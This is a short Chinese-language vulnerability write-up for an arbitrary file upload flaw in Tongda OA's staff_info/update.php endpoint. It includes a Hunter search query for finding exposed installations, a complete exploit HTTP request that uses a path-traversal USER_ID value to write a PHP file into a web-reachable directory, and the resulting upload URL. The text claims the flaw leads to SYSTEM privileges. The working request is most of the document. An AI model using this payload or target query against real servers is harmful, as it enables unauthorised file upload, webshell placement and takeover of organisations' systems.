T10-14通达-OA-文件上传
漏洞描述:
后台/general/hr/manage/staff_info/update.php存在任意文件上传漏洞,用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得system权限。
网站图片:
网络测绘:
Hunter 语法:
app.name=“通达 OA”
漏洞复现:
payload:
POST /general/hr/manage/staff_info/update.php?USER_ID=./general/reportshop/workshop/report/attachment-remark/1.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: PHPSESSID=ffelnhdqmui12fbm7mhjfip5h3; path=/
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 203
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="ATTACHMENT"; filename="."
123
--00content0boundary00
Content-Disposition: form-data; name="submit"
保存
--00content0boundary00--
效果图:
文件上传位置
http://your-ip/general/reportshop/workshop/report/attachment-remark/1.php